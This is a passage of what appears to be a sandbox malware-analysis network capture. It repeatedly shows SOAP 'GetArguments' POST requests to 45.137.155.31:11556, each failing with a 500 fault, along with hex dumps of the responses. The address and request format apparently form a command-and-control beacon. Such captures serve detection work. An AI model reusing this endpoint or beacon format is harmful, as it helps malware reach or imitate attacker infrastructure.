20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:46.852746964 CEST1161OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:46.924748898 CEST1162INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:46.996185064 CEST1163INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:46 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:48.008903027 CEST1163OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:48.078175068 CEST1164INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:48.147993088 CEST1165INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:48 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:49.165903091 CEST1170OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:49.234884024 CEST1174INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:49.304136038 CEST1177INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:49 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:50.322942019 CEST1184OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:50.392438889 CEST1185INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:50.462193012 CEST1187INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:50 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:51.477946997 CEST1193OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:51.549185991 CEST1193INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:51.622066975 CEST1194INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:51 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:52.634804010 CEST1195OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:52.703515053 CEST1195INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:52.777390957 CEST1196INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:52 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
